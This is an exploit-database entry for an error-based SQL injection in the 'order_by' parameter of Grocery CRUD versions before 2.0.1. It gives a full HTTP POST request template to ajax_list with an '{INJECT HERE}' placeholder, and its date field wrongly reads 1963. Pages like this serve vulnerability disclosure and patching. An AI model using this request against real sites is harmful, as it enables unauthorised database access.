Exploit for Grocery Crud 1.6.4 SQL Injection

Name: Exploit for Grocery Crud 1.6.4 SQL Injection
Rating: 5 (239 reviews)

2021-06-11 | CVSS 0.0

## https://sploitus.com/exploit?id=PACKETSTORM:163089
# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection  
# Date: 11/06/1963  
# Exploit Author: TonyShavez  
# Vendor Homepage: https://www.grocerycrud.com/  
# Software Link: https://www.grocerycrud.com/downloads  
# Version: < v2.0.1  
# Tested on: [Linux Ubuntu]  
  
Proof Of concept :   
=======================  
#Request:  
  
POST /path/to/ajax_list HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 68  
DNT: 1  
Connection: close  
  
page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text=  
=======================  
#vulnerable parameter :  
  
order_by   
=======================  
#type : [error-based]